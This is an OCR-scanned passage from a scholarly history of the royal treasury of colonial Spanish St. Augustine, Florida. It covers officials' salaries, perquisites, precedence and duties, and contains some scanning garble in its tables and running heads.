without Rations Salary as Stated (in ducats) 2,000 ducats/yr 400,000 maravedis/yr 515 ducats/yr 500 ducats/yr 260 ducats/yr 200 ducats/yr 200 ducats/yr 200 ducats/yr 150 ducats/yr 12 ducats/mo 10 ducats/mo 6 ducats/mo 1,200 reales/yr and plaza 200 pesos/yr 4 ducats/mo 4 ducats/mo 115 ducats/yr 1,000 maravedis/mo 1 real/day in trade goods 2 lbs. flour/day 2,000 1,067 515 500 260 200 200 200 150 144 120 72 64 62 48 48 32 33 of Rations (in ducats) 83 83 83 83 83 83 83 83 83 83 83 83 83 83 83 83 115 83 50 36 including Rations (in ducats) 2,083 1,150 598 583 343 283 283 283 233 227 203 155 147 145 131 131 115a 115 83b 36c a. Beginning this year, stated supplies were given whose value increased with prices. b. Approximate. Depended upon value of trade goods and maize. c. Varied with the price of flour. repartimiento Indian received almost exactly the same pay before rations as a soldier.33 The soldier; of course, was often issued addi- tional rations for his family, while the Indian got only two or two- and-a-half pounds of maize per day, worth perhaps 1 /2 reales-and he might have brought it with him on his back as part of the tribute from his village.34 A Franciscan drew his entire 115-ducat stipend in goods and provisions. In 1641 the crown consented to let these items be constant in quantity regardless of price fluctuations.35 It is ironic / that natives and friars, both legendarily poor; were the only individu- als in town besides the sacristan's sweeping boy whose incomes could rise with the cost of living.36 It was acceptable to hold multiple offices. Pedro Menendez Mar- / 39 Year 1601 1601 1646 1655 1594 1636 1593 1601 1636 1593 1603 1601 1630 1693 1601 1601 1641 1601 1676 The King's Coffer quez's salary as governor of Florida began the day he resigned his title of Admiral of the Indies Fleet-more important than his concurrent one of Florida accountant.37 Don Antonio Ponce de Le6n usually exercised several positions at once. In 1687 he was at the same time chief sacristan of the church, notary of the ecclesiastical court, and notary of the tribunal of the Holy Crusade. Periodically he was appointed defense attorney for Indians. While visiting Havana, probably in 1701, he was made ecclesiastical visitador for Florida and church organist for St. Augustine. He returned home from Cuba on one of the troopships sent to break the siege of Colonel Moore, and as luck would have it, the day before he landed, the withdrawing Carolinians and Indians burned the church with the organ in it. Don Antonio presented his title as organist notwithstanding and was added to the payroll in that capacity since, as the royal officials pointed out, it was not his fault that there was no organ. By 1707 he had taken over the chaplaincy of the fort as well.38 Members of the religious community had sources of income other than the regular stipends. The parish priest was matter-of-fact in his discussion of burial fees and other perquisites. If these ran short, he could go to Havana, say a few masses, and buy a new silk soutane. In St. Augustine the value of a mass was set at seven reales, and the chaplain complained that the friars demanded cold cash for every one they said for him when he was ill and unable to attend to his duties.39 Parishioners brought the Franciscans offerings of fish, game, and produce in quantities sufficient to sell through their syndics. The income was intended to beautify churches and provide for the needy, but one friar kept out enough to dower his sister into a convent.40 In the garrison it was possible to collect the pay of a soldier without being one. There were seldom as many soldiers fit for duty as there were authorized plazas in the garrison, and the vacant spaces, called "dead-pays" (plazas muertas), served as a fund for pensions and allowances. A retired or incapacitated soldier held his plaza for the length of his life. A minor's plaza (plaza de menor or muchacho) could be purchased for or granted to someone's son to provide extra in- come, and if the lad developed no aptitude as a soldier the money did not have to be paid back. Plazas were used variously as honoraria to Indian chiefs, dowries, and salary supplements: a captain traditionally named his own servants or slaves to posts in his company and pock- eted their pay.41 40 Proprietary Office Understrength in the garrison due to these practices was a peren- nial problem. Sometimes it was the governor who abused his power to assign plazas. The crown refused to endorse nineteen of them awarded by Interim Governor Horruytiner to the sons, servants, and slaves of his supporters. At other times the government in Spain was to blame. Governor Hita Salazar complained that every ship to arrive bore new royal grants of plazas for youngsters, pensioners, and widows. A few of these were outright gifts; on most, the crown collected both the half-annate and a fee for waiving its own rule against creoles in the garrison. Again and again governors protested that of the plazas on the payroll only half were filled by persons who would be of any use to defend the fort and the town.42 A soldier's plaza was not his sole source of income. On his days off guard duty he worked at his secondary trade, whether it was to burn charcoal, build boats, fish, cut firewood, make shoes, grind maize, round up cattle, tailor; or weave fishnets. A sawyer or logger could earn 6 or 7 reales extra a day. Every family man was also a v part-time farmer; with his own patch of maize on the commons and cheap repartimiento labor to help him cultivate it.43 The soldier had still other advantages. When traveling on the king's business he could live off the Indians, commandeer their canoes, order one of them to carry his bedroll, and cross on their ferries free.44 His medicines cost nothing, although a single shipment of drugs for the whole presidio cost over 600 pesos. The same soldier's compulsory contribution to the hospital association of Santa Barbara, patroness of artillerymen, was limited to 1 real a month.45 When he became too old to mount guard he would be kept on the payroll, and after he died his family would continue to receive rations. The weapons in his possession went to the woman he had been living with, and his back wages paid for his burial and the masses said for the good of his soul.46 An officer was entitled to these privileges and more. Not only might his slaves and servants bring in extra plazas, but he was in a position to sell noncommissioned offices, and excuses and leaves from guard duty.47 It was possible for him to draw supplies from the royal storehouses almost indefinitely. With his higher salary he had readier cash and could order goods on the supply ship, purchase property at auction, or buy up quantities of maize for speculation.48 A treasury official possessed most of the advantages of an officer j plus others of his own. When he served as judge of the exchequer he 41 The King's Coffer Swas entitled to a portion after taxes, probably a sixth, of all confis- cated merchandise. When he was collector of the situado he drew a per diem of thirty reales, which may have been why Juan de Ce- vadilla asked the crown to supplement his low salary as treasurer With the good salary of a situador.49 As a manager of presidio supplies the treasury official favored his kinsmen and friends who were importers and cattle ranchers. In time of famine he drew more than his share of flour. As a payroll officer he credited himself with all the maravedis over a real, since there was no longer a maravedi coin in the currency. As a regidor the official took turns with his colleagues at tavern inspection. Each time a pipe was opened he collected one peso.50 There must have been many similar ways to supplement a salary, some acknowledged and others only implied. The duties of a royal official were not necessarily done by him personally. An official was often absent, traveling to New Spain or Havana, visiting the provinces, or looking after his property. He Chose a substitute, the substitute posted bond, and they divided the salary. If the substitute found it necessary to hire a replacement of his own, the subject of payment was reduced to a private deal between the parties. When a proprietary office fell vacant, the governor enjoyed the right of appointing ad interim, unless the crown had sold a future and the new proprietor was waiting. Interim officials were paid half of a regular salary, the same as substitutes.51 The routine work of the Florida treasury may have been done more often by substitutes than proprietors, especially in the late seventeenth cen- tury, when officials serving as situadores were kept waiting in Mexico City for years. This raised questions ofliability. Was the royal treasurer, Matheo Luis de Florencia, accountable for a deficit in the treasury when he had been in New Spain the entire five years since his installation? The crown referred the question to its auditors.52 The interim or substitute official was supposed to be someone familiar with the work of the treasury and possessed of steady charac- ter: rich, honorable, and married. It was unwise, though, to choose someone whose connections made him aspire to office himself. Alonso Sanchez Saez came to Florida with his uncle Lazaro Saez de Mercado, the accountant, and became a syndic for the friars. When Lazaro died the governor named Alonso ad interim on half-pay. At the next audit there was some question about his having been related to the former accountant, but the crown ruled that the governor 42 Proprietary Office could allow what was customary. Since at that time only a half of salaries was paid from the situado and the coffer had few revenues, the interim accountant's salary translated into 100,000 maravedis a year for a 400,000-maravedi position. His requests for a royal title and full salary were ignored, as were his complaints about his heavy duties. The next proprietor; Bartolome de Argfielles, kept Alonso substituting in the counting house during his own lengthy ab- sences.53 The embittered nephew, who had inherited the work but not the salary or honor of his office, made a name for himself in St. Augustine by sequestering funds, giving false alarms, and being generally contentious. The governor forbade him to sit on the same bench during Holy Week with the other treasury officials. Alonso circulated a rumor that the governor was a defrocked friar. The interim accountant and his wife, whom he always called "a daughter of the first conquerors," were eventually expelled from town, carry- ing the governor's charges against them in a sealed envelope.54 In a place as precedent-conscious as St. Augustine, the cases defining what was to be done about leaves of absence were impor- tant. Factor Alonso de las Alas quarreled with TreasurerJuan Menen- dez Marquez in 1595 over whose turn it was to go for thesituado. Las Alas thought he had won, but when he got back from New Spain the treasurer and the governor indicted him for bringing part of the situado in clothing instead of cash. At their recommendation the Council suspended him for four years without salary. 55After his reinstatement Las Alas requested a two-year leave to go to Spain. The treasurer had obtained a similar leave on half-salary the year before, but the crown felt no obligation to be consistent: Las Alas had to take his leave without pay.56 The accountant, Bartolome de Argiielles, also received a two-year leave to attend to personal business, and v when it expired he did not return. Years later his widow, dofia Maria de Quiiiones, was still trying to collect his half-pay to use for the dowries of four daughters.57 An official who experimented with informal leaves of absence was Accountant Nicolas Ponce de Leon. He was a veteran of Indian wars in Santa Marta, a descendant of conquerors in Peru, and, most important, the son-in-law of a Council of the Indies porter. From the preserved slate ofnominees, he was also the only one out of thirty-six candidates with no previous exchequer experience. When the gov- ernor of Florida died in 1631, shortly after his arrival, Nicolas found 43 The King's Coffer himself thrust into a co-interim governorship with the psychopathic Sergeant Major Eugenio de Espinosa.. In mortal fear of his partner; who had threatened to cut offhis head, he took refuge in the Francis- can convent until the next governor should arrive. He assured the crown that this caused the treasury no inconvenience for he had named a reliable and competent person to do what work could not be brought to the convent.58 In 1637 this same Nicolas Ponce de Le6n had Treasurer Francisco Menendez Marquez imprisoned on charges of having spent situado funds in Mexico City on gambling and other things "which for modesty and decency cannot be mentioned." Perhaps the accountant decided that unmentionable sins deserved closer examination. In 1641 he went to Mexico City himself, where he got the viceroy to throw Martin de Cueva, a former situador; into prison and settled down for a leisurely lawsuit before the audiencia. After three years the gov- ernor of Florida sent word for Nicolas to return or have his powers of attorney revoked. Nicolas appealed the governor's order to the audiencia. In 1645 the next governor declared the accountant absent without leave and replaced his substitute, who had let the papers of the counting house fall into confusion. The king finally intervened in the case and ordered the viceroy of New Spain to send the recreant accountant of Florida, who had been amusing himself for the last five years in Mexico City, home to look after his duties. After an absence of seven years Nicolas returned to resume his office and family. His holiday does not seem to have been held against him.59 A case of purchased leave of absence was that of TreasurerJoseph de Prado. Prado did not buy his office: the position was given him when he was almost fifty, for his services to the crown. He did not distinguish himself in Florida. During the Robert Searles raid of 1668 he was the only grown man in town to be captured in his bed and carried out to the ships for ransom along with the women. A month later he was sold a license to spend ten years in Guadalajara for the sake of his health. In 1674 he left St. Augustine and thereafter replied to no letters. When the ten years were up Governor Marques Cabrera reported that no one knew whether Prado was dead or alive and asked that the office be refilled. An indifferent Junta de Guerra clerk replied that Prado had paid 600 pesos for the privilege of absenting himself for unlimited periods as he pleased.60 The "honors, deferences, graces, exemptions, liberties, preemi- 44 Proprietary Office nences, prerogatives and immunities" promised to the royal official in his title were as dear to him as his salary and substitutes and maybe more so, for they acknowledged his position as one of rank and privilege. He had precedence. He and his family were persons of consequence. Such perquisites of office were partly tangible and partly deferential. Tanible symbols of office were the official's staff ofoffice (vara), his key to the coffer; and his residence in a government house. In the seventeenth century it was a common sign of authority to carry a staff The governor had his baton and so had Indian chiefs. Staves and banners even served as metonyms for office. Nicolas Ponce de Le6n II said that "the banner of the militia company being vacant," his son Antonio was appointed company ensign. Governor Marques Cabrera, being rowed out to the waiting galley on the day he de- serted, threw his baton into the sea, crying, "There's where you can go for your government in this filthy place!"61 In his role of royal \ judge a treasury official bore one staff, and as a regidor he was entitled / to another. When the choleric Sergeant Major Espinosa, enraged at Nicolas Ponce de Le6n I, was restrained by companions from killing him, he called into the counting house to his adjutant to seize the accountant's symbol of authority and arrest him. The officer did so, breaking Ponce de Le6n's staff to pieces.62 Keys were symbols of responsibility as staves were of authority. When the warden of te castifllo made his oath of fealty to defend his post, he took charge of the keys of the fort and marched through its precincts with the public notary, locking and unlocking the gates.63 A similar ceremony was observed with a new treasury official, who received his key to the treasure chest and immediately tried it. In legal documents this chest was sometimes called the "coffer of the four keys," from the days when there would have been four padlocks on it, one for each official. At important treasuries another key was frequently held by the viceroy, the archbishop, or an audiencia judge, who sent it with a representative when the chest was opened. The royal officials resented this practice as impugning their honor.64 It was the treasury officials' privilege and duty to reside in the houses of government (casas reales) where the coffer waskeptf. These buildings varied in number and location along with the relocations of the town. During the sixteenth century St. Augustine moved about with the sites of the fort. According to Alonso de las Alas, the first 45 The King's Coffer presidio, known to him as "Old St. Augustine," was built on an island facing the site of the town he lived in. St. Augustine was moved "across to this side" when the sea ate the island out from under it. In its new location on the bay front the town had a guard- house, an arsenal under the same roof as the royal warehouse, and perhaps a customs-counting house at the dock.65 There were no official residences. Three successive governors rented the same house on the seashore-Governor Ybarra thought it a most unhealthful location. This St. Augustine, and a new fort on the island of SanJuan de Pinillo, were destroyed by Drake in 1586; a later St. Augustine, by fires and a hurricane in 1599.66 Disregarding Pedro Menendez's idea to move the settlement to the site of an Indian village west of the San Sebastian inlet, Governor Mendez de Canzo rebuilt it a little to the south, where the landing was better protected and a curving inlet provided a natural moat. He laid a bridge across the nearby swamp, sold lots, and bought up lumber. In spite of the treasury officials' disapproval he began paying daily wages to repartimiento workers and put the soldiers to work clearing land. To finance his real development he exacted contribu- tions from those with houses still standing, approved harbor taxes, cut down on bonuses and expense allowances, and diverted the funds sent for castillo construction. The king helped with four years of tithes, 276 ducats from salvage, and 500 ducats besides.67 Following Philip II's 1573 ordinances for town planning, Mendez de Canzo laid out the plaza in back of the landing: 250 by 450 feet, large enough for a cavalry parade ground. Around the plaza he constructed a new guardhouse, a royal warehouse doubling as treasury, and a gover- nor's mansion. He also built a gristmill and an arsenal and started a counting house onto which a customs house could be added.68 The royal officials might have the right to live in government houses, but they did not intend to move into quarters that were inadequate. In the time of Governor Salinas the crown finally ap- proved construction of suitable residences to be financed from local revenues and, when these proved insufficient, from the castillo fund. The proprietors were satisfied. "In all places where Your Majesty has royal officials they are given dwelling houses," they had said, and now there were such houses in St. Augustine.69 When the factor- overseer's position was suppressed a few years later the vacated third residence was assigned by cedula to the sergeant major70 46 Proprietary Office All the buildings in town at this time seem to have been of wood, with the better ones tiled or shingled and the rest thatched with palm leaves. By 1666 the government houses, including the counting house and the arsenal, were ready to collapse. A hurricane and flood leveled half the town in 1674, but again rebuilding was done mostly in wood, although there was oyster shell lime and quarried coquina available on Anastasia Island for the stone masonry of the new castillo.71 There seems to have been some subdividing of original lots. During the governorship ofHita Salazar; Sergeant Major Pedro de Aranda y Avellaneda bought a lot within the compound of the government houses close to the governor's mansion, although he had applied for a different one in the compound of the treasury and royal warehouse. The royal officials not only sold it to him but supplied him with the materials to build a house next to the gover- nor's. The next governor, Marques Cabrera, managed to block Aranda's building there, but not on the lot beside the treasury. Displeased with what he called the deterioration of the neighbor- hood, the governor turned the gubernatorial mansion into a public _1 inn and requisitioned for his residence the house of Ana Ruiz, a widow, two blocks away.72 The next governor, Quiroga y Losada, proposed to sell the gov- ernment houses and put up a new stone building to contain the governor's residence, the counting house, and the guardhouse. The royal officials could move into his renovated old mansion and their houses be sold.73 Six months later-suspiciously soon-the new government house was finished. Appraised at 6,000 pesos, it had been built for 500. Quiroga y Losada had not followed his own submitted plan, for the counting house, treasury, and royal officials were still housed as they had been, in buildings that he and the next governor repaired and remodeled in stone.74 When Colonel Moore and his forces arrived to lay siege to the castillo in 1702, the treasury was on the point of being re-shingled. When they marched away, nothing was left of any of the government houses except blackened rubble.75 If the tangible symbols of office were staves, keys, and residences, the deferential symbols of office were precedence and form of ad- dress. Precedence was a serious matter. Disputes over who might walk through a door first, sit at the head of a table, or remain covered in the presence of someone else were not just childish willfulness but 47 The King's Coffer efforts to define the offices or estates that would take priority and those that would be subordinate.76 When parish priest Alonso de Leturiondo locked the church on Saint Mark's Day because the governor had sent someone less important than the treasurer to invite him to the official celebration, it was not solely from offended pride. As he said, he must maintain the honor of his office.77 The order of procession at feast days and public ceremonies was strictly observed. Treasury officials, who embodied both fiscal and municipal dignities, took precedence over all exclusively religious or military authorities. The two first ministers of Florida at the local Acclamation of Philip V were the interim accountant and the treas- urer, "who by royal arrangement follow His Lordship in seat and signature." The accountant stood at the governor's left hand and the treasurer, serving as royal standard-bearer for the city, at his right, leading the hurrahs of "Castilla Florida" for the new monarch and throwing money into the crowd.78 In some treasuries precedence among the royal officials was determined by the higher salaries of some or by the fact that proprie- tors were regidores of the cabildo and substitutes were not. In St. Augustine, where these differences did not exist, the only bases for precedence were proprietorship and seniority. The one who first stepped forward to sign a document was the one who had been a proprietor in Florida the longest.79 The final right of a royal official was not to be mistreated verbally. The form of address for each level in society was as elaborately prescribed as the rest of protocol, and a lapse could only be regarded as intentional. The governor was referred to as Su Senioria (His Lordship) and addressed as Vuestra Setnoria or Vuestra Excelencia (Your Excellency), abbreviated to Vuselensia or even Vselensia in the dis- patches of semiliterate corporals.80 Governor Ybarra implored the Franciscan guardian to keep the reckless Father Celaya confined in the convent, for "if he shows me disrespect [on the street] I shall have to put him into the fort... for I must have honor to this office."81 Friars were called Vuestra Paternidad (Your Fatherliness). A Spaniard of one's own rank was addressed as Vuestra Merced (Your Grace), shortened in usage to Usarced, Usarce, or Busted (precursors of Usted).82 Only the king could address officials in the familiar form, otherwise used for children, servants, and common Indians. After Governor Mendez de Canzo had addressed TreasurerJuan Menendez 48 Proprietary Office 49 Marquez publicly as "vos," his epithets of "insolent" and "shameless one" were superfluous. The crown's reaction to such disrespect toward its treasury officials was to reprimand the offender and order him in future to "treat them in speech as is proper to the authority of their persons and the offices in which they serve us, and because it is right that in everything they be honored."83 As proprietor of the exche Aqur-thergasuxFfficiaI had the second highest salary in town, job tenure, free housing, and the opportunity ttef substitut s-dhis work In his connection with the garrison he could count on regular rations, supplies, and a career for his sons. Because he was regidor of the cabildo, the whole regional economy was laid before him to adjust to his advantage. And beyond all this were the prized "honors, deferences, graces, exemptions, liberties, preeminences, prerogatives and immunities." A proprietary official of the royal treasury was as secure financially and socially as any person could be who lived in that place and at that time. 4 Duties and Organization HE work of the treasury was conducted mainly in the houses SCof government: the counting house, the customs house, the royal warehouse and arsenal, and the treasury. For all of this work the royal officials were collegially responsible, and much of it they did together; but each of them also had his own duties, his headquarters, and one or more assistants. The organization of the treasury is shown in Table 2, with the patron or patrons of each position. Those posi- tions for which wages are known are in Table 3. The title of accountant called for training in office procedures. Roving auditors might find errors and make improvements in the bookkeeping system, yet this could not take the place of careful routine. In the words of New Spain Auditor Irigoyen: "The account- ant alone is the one who keeps a record of the branches of revenue and makes out the drafts for whatever is paid out, and any ignorance or carelessness he displays must be at the expense of Your Majesty's exchequer."1 Unfortunately, not every hidalgo who was appointed accountant enjoyed working with figures. Some left everything in the hands of subordinates, signing whatever was put in front of them. The accountant did not handle cash. He was a records specialist, the archivist who preserved royal cedulas, governors' decrees, and treasury resolutions. He indexed and researched them, had them copied, and was the authority on their interpretation. He kept the census of native tributaries-a count supplemented but not dupli- cated by the friars' Lenten count of communicants.2 It was his busi- 50 Duties and Organization 51 ness to maintain personnel files, entering the date when an individual went on or off payroll and recording leaves and suspensions. No one was paid without his certification. Sometimes the crown asked for a special report: the whereabouts of small firearms in the provinces, a list of Indian missions and attendant friars with the distances between them in leagues, a cost analysis of royal slave earnings and expenses, even an accounting of empty barrels. Instructions came addressed to TABLE 2 TREASURY ORGANIZATION AND PATRONAGE IN ST AUGUSTINE, 1591-1702 Patrons King and Royal Treasury Positions and Dates Created Council Governor Officials Council Other Treasury Council Governor x Accountant x Factor-overseer to 1628 Treasurer to 1628 Treasurer-steward (1628) x Interim officials x Substitute officials xa x Public and govt. notary to 1631 1631 onb Commissioned Agents Situador xc Procurador x Supply ship masters x Provincial tax collectors x Expedition tax collectors x Counting House Chief clerk (1593) x Assistant clerk (1635) x Lieutenant auditor (1666) xd Internal auditor to 1666 Customs House Customs constable (1603) to 1636 1636 on Chief guard (1630) x Guards (as needed) x Warehouse and Arsenal Steward x Rations and munitions x notary a. With the governor's consent. b. Auctioned. c. Chosen by auditor and governor. d. Most common practice; varied frequently. 52 The King's Coffer TABLE 3 WAGES AT THE ST AUGUSTINE TREASURY IN THE SEVENTEENTH CENTURY Salary Per Diem or Total without Daily Rations (in Position Rations (in reales) Bonus ducats) Proprietor 400,000 mrs/yr 2'/2 1,150 Proprietor as situador 400,000 mrs/yr 30 2,062 Captain as procurador 200 ducats/yr 15 20 ducats/mo 938 Interim or substitute official 200,000 mrs/yr 21/2 618 Lieutenant auditor 500 pesos/yr 21/2 444 Chief clerk 1,000 mrs/mo 21/2 200 pesos/yr 260 Chief guard 250 ducats/yr* 250 Steward 50,000 mrs/yr 21/2 217 Customs constable 1,000 mrs/mo 21/2 25,000 mrs/yr 182 Rations notary 5 ducats/mo 21/2 400 reales/yr 179 Public and govt. notary 1,000 mrs/mo 2/2 400 reales/yr 151 Assistant clerk 1,000 mrs/mo 21/2 50 pesos/yr 151 *This figure may include rations. all the royal officials and they all signed the prepared report, but the accountant and his staff did the work.3 The counting house was staffed by a number of clerks. Before their positions were made official the accountant sometimes hired an accounts notary (escribano de cuentas) out of his own salary.4 In 1593 the crown approved a chief clerk of the counting house officiall mayor de la contaduria) to be paid a regular plaza and 200 pesos from the bonus fund. When the accountant was away this clerk usually served as his substitute. The position of assistant clerk of the counting house officiall menor de la contaduria) with a salary supplement of 50 pesos a year was approved in 1635. The assistant clerk was also known as the clerk of the half-annate officiall de la media anata), although the half- annate was seldom collected.5 If the work load at the office became heavy, temporary help might be hired, but the king did not want this charged to his treasury. When Accountant Ponce de Le6n and his substitute allowed the books to get eight years behind, the other officials were told to deduct from salaries the cost of bringing them up to date.6 In 1688, soon after a third infantry company was formed, Accountant Thomas Menendez Marquez requested permission to hire a third clerk for the increased paperwork. Instead, he was or- dered to reduce his staff from two clerks to one-an order that was neither rescinded nor, apparently, obeyed.7 There was by that time another official at the counting house: a lieutenant auditor chosen by Duties and Organization the royal auditor and the governor to replace the internal auditor who had been appointed periodically. These two positions are discussed in Chapter 8. The treasury officials were a committee of harbor masters, regis- tering the comings and goings of people as well as ships. It was their duty to see that no one entered the provinces without the correct papers, or left without the governor's consent and their own fiscal release. Impetuous young Pedro de Valdes, betrothed to Menendez's daughter Ana, was probably the only person ever to stow away for Florida, but convicts, soldiers, and even friars tried to escape. The presidio's ships had to be manned by Indians and mixed-bloods who could be relied upon to return home.8 When the royal officials first began collecting harbor taxes, they recognized the need of a customs constable and inspector (alguacil y fiel ejecutor de la aduana) to record what was loaded and unloaded from ships. Otherwise they had to take turns at the customs house them- selves, which Alonso Sanchez Siez, at least, was unwilling to do.9 The crown approved the new position in 1603, with a 25,000- maravedi bonus and no doubt a percentage of goods confiscated.10 The governor appointed as first constable Lucas de Soto, a better sort of soldier sentenced to serve four years in Florida for trying to desert to New Spain from Cuba. By 1608 De Soto was in Spain with dispatches, receiving the salary of customs constable but not doing the work. In 1630 the crown approved a position of chief guard (guardamayor) for all ports, to be chosen by the treasury officials and to select his own assistants. In St. Augustine he was paid a respectable salary of 250 ducats. The royal officials soon objected that the gov- ernor appointed all the guards and was thus able to unload ships by night or however he pleased without paying taxes; the customs constable was no more than his servant and secretary. In response to their letter the officials were assigned patronage of the constable's post as well. Within ten years they too were letting him serve by proxy.11 It was a temptation to double up on offices and hire out the lesser one. In the early 1670s a Valencian named Juan de Pueyo came to St. Augustine and begat to work his way up in the counting house, beginning as the clerk of the half-annate. According to the treasury officials, since counting house salaries were low they also gave him the post of constable, which carried its own assistant in the chief 53 The King's Coffer guard of the customs house. Pueyo knew the importance of family. He was promoted to chief clerk around the time his wife's sister married the accountant's son. As chief clerk of the counting house Pueyo supervised the assistant clerk, and as customs constable, the guards. By 1702 the Valencian, serving as interim accountant, stood at the governor's left hand during the Acclamation of Philip V as one of the provinces' first ministers. For someone who had started as an under-bookkeeper he had come a long way.12 As early as 1549 the offices of factor and overseer had begun to be combined in the Indies. Two years before St. Augustine was founded the crown determined that the smaller treasuries did not need the factor-overseer either and that that official's duties could be divided between the accountant and the treasurer. A factor-overseer was named for Florida nevertheless, because Spanish occupation there began as an expedition of conquest: a factor was needed to guard the king's property, and an overseer to claim the royal share of booty and to supervise trade. The adelantado expected Florida to become an important, populous colony with port cities, which would need a manager of commerce.13 Although the St. Augustine treasury turned out to be a small treasury indeed, it kept a factor-overseer for over sixty years. He was the business manager who received the royal revenues paid in kind and converted them to cash or usable supplies at auction, whether they were tithes of maize and cattle, the king's share of confiscated goods, tributes, or the slaves of an estate under- going liquidation. Whatever was to be auctioned was cried about town for several days, for it was illegal for the treasury to conduct a sale without giving everyone a fair chance to buy. Cash was pre- ferred, but the auctioneer sometimes accepted a signed note against unpaid wages.14 It was the factor in a presidio, as in an armada, who was account- able for the storage and distribution of the king's expendable prop- erties: supplies, provisions, trade goods, and confiscated merchandise. For these duties he had an assistant called the steward of provisions and munitions (tenedor de bastimientos y municiones). The first steward for the enterprise of Florida, it happened, was appointed ahead of the first factor. Pedro Menendez named his friend Juan deJunco to the position while they were still in Spain. In 1578Juan's brother Rodrigo became factor-overseer and technically Juan's superior. Rodrigo 54 Duties and Organization suggested that stewards were needed at both St. Augustine and Santa Elena, and the crown agreed to consider it.1x The other officials saw the need of two stewards, but not of their colleague Rodrigo. Treasurer Juan de Cevadilla, shortly after he arrived, said that in the beginning a treasurer had been in charge of the armada provisions and supplies, assisted by a steward, who was paid 50 ducats a year above his plaza. If the same were done in Florida the factor's position could be abridged. Accountant Bartolome de Argiielles tried to speed the cutback by saying that it looked as if Factor Rodrigo de unco had nothing to do. The office of factor was meant for places with mines, he said. The work of an overseer- looking after musters, purchases, and fortifications-was done by the accountant in Havana, and Argiielles thought he could handle it in St. Augustine.16 The Council might have been more impressed with his offer had he not gotten the duties of factor and overseer reversed. In 1586 permission arrived for an extra 50,000 maravedis a year with which to pay two stewards. It was better to have persons with rewards and regular salaries in positions of responsibility, the au- thorizing official noted; a plain soldier could not raise bond, and losses would result. 17 Juan de Cevadilla, by now Rodrigo de unco's son-in-law, had a brother Gil who became the second steward. This convenient arrangement lasted until Cevadilla died in New Spain in 1591. Junco was promoted to governor but, on his way to St. Au- gustine from Spain, was shipwrecked and drowned in the St. Johns estuary along with Treasurer-elect Juan de Posada. The king's choice for a new factor never made the trip to Florida. For the time being, Accountant Argiielles was the only royal official. With Santa Elena permanently abandoned there was need of only one steward. Argiielles persuaded the incoming governor to remove both Gil and Juan and install Gaspar Fernindez de Perete instead, on the full 50,000 maravedis salary.18 The accountant's 1591 instructions to the new steward show the care with which royal supplies and provisions were supposed to be guarded.19 Fernandez de Perete must not open the arsenal save in the presence of the rations and munitions notary, a constable, and the governor. To guarantee this, it had three padlocks. He must keep the weapons, matchcord, gunpowder and lead safe from fire. (There was little he could do about lightning. In 1592 a bolt struck the powder 55 The King's Coffer magazine and blew up 3,785 ducats' worth of munitions.) The stew- ard must protect the provisions against theft and spoilage, storing the barrels of flour off the ground and away from the leaks in the roof; keeping the earthenware jars of oil, lard, and vinegar also off the ground and not touching each other in a place where they would not get broken; examining the wine casks for leakage twice a day and tapping them occasionally to see whether the contents were turning to vinegar in the hot wooden buildings.20 It was the steward's re- sponsibility to keep a book with the values by category of everything kept in the warehouses, from ships' canvas to buttons. Once a year the royal officials would check this book against the items in inven- tory. Anything missing would be charged to the steward's account. On the first of every month they and the governor would make a quality inspection, in which anything found damaged due to the steward's negligence was weighed, thrown into the sea, and charged to him.21 Argiielles' opportunity to supervise the steward did not last. A new factor-overseer, Alonso de las Alas, quickly established his authority over the steward's position, which he had once held. When Las Alas' suspension was engineered a few years later the governor replaced both him and the steward with Juan L6pez de Aviles, a veteran of the Menendez armada.22 The harried interim official complained that of all the officials he was the busiest and most exposed to risk, answering for the laborers' wages, the royal ships, and the slaves, besides the rations and supplies.23 After Factor Las Alas was reinstated and recovered control of the warehouses, he used them for storage of his own goods flourr hardtack, wine, meat, salt, blankets), and, through a false door, the king's property found its way into his house. It was said that 100,000 pounds of flour went out through that door to be baked into bread and sold in one of the shops he and the treasurer owned in town-shops they secretly supplied with unregistered merchandise. Governor Fernandez de Olivera suspended them both. His interim appointees to the treasury found Las Alas short 125 pipes of flour; 5,540 pints of wine, 1,285 pints of vinegar and 94jugs of oil-and this was only in the provisions.24 On his way to defend himself before the Council, Las Alas was wounded by a pirate musketball and died owing the crown 5,400 ducats. Hoffman and Lyon, following his story, were surprised to discover 56 Duties and Organization three subsequent cedulas praising Las Alas' integrity and services during an attempted colonization of the Straits of Magellan to fore- stall Drake. An heir of the twice-suspended factor was granted 200,000 maravedis, the salary which had accumulated after Las Alas' death while his post was vacant.25 Although the king filled the factorship once more (or honored a commitment) withJuan de Cueva, this time was recognized to be the last. Governor Salinas suggested in 1620 that an accountant and a steward were all Florida really needed. The Council, considering his letter four years later; recommended that the royal will be to suppress the office of factor-overseer in Florida and combine the positions of treasurer and steward. A certain delay in implementing this will would be unavoidable, treasury offices being lifetime appointments, but Florida officials might be given first consideration for vacancies elsewhere. In 1624 Francisco Ramirez, the accountant, was offered a transfer to the treasury soon to be established at the mines of San Luis Potosi in New Spain; Factor Juan de Cueva was to become Florida accountant in his place. Ramirez declined to move. In 1628, the year Francisco Menendez Marquez won his case to be recognized as Florida treasurer; Cueva began serving as accountant in place of Ramirez, who was semiretired. He may have continued his stewardship duties as well, but not with his old title of factor- overseer. After the king's new appointee arrived in 1631, Cueva left for San Luis himself, to be that treasury's accountant.26 The treasurer's individual functions were those of a cashier. He received the royal revenues paid in specie and disbursed the sums that he, the other officials, and the governor had approved. The coffer was his particular responsibility; he lived in the building where it was kept. Because little money got to Florida the duties of this office were light. The gossipy Accountant Argiielles said that once the yearly payroll had been met the treasurer had nothing to do.27 Perhaps this was why in 1628, the year the factorship was suppressed, the duties of steward were given to the treasurer and the position treasurer- steward was created.28 In vain Accountant Nicolis Ponce de Le6n warned the king that letting Treasurer Francisco Menendez Marquez have access to the supplies as well as the money would make him more powerful than the accountant and the governor together.29 In 1754, after three sons and a grandson of Francisco had served their 57 The King's Coffer own proprietorships in the treasury, a Bourbon king took the further step of suppressing the accountancy and reducing the number of officials to one, the treasurer.30 But that is outside the scope of this study. Every day except Sundays and feast days the royal officials went to the work of the day directly after meeting at morning mass.31 It might be the day for an auction, or for the monthly inspection of munitions and supplies. When a pilot came in from coastal patrol his declaration of salvage and barter had to be taken and his equipment and supplies checked in. A deputy governor in from the provinces would present his report of taxes collected, or a new census of tributaries. The masters of supply ships brought in their receipts and vouchers to find out what balance they owed to the treasury. If the ship had brought a situado, the time required would be magnified several times. Once a week the treasury officials held a formal treasury council (acuerdo de hacienda) attended by the public and governmental notary (escribano ptiblico y de gobernaci6n). Without this notary's presence there could be no legal gathering for government business, no public pronouncement, and no official action or 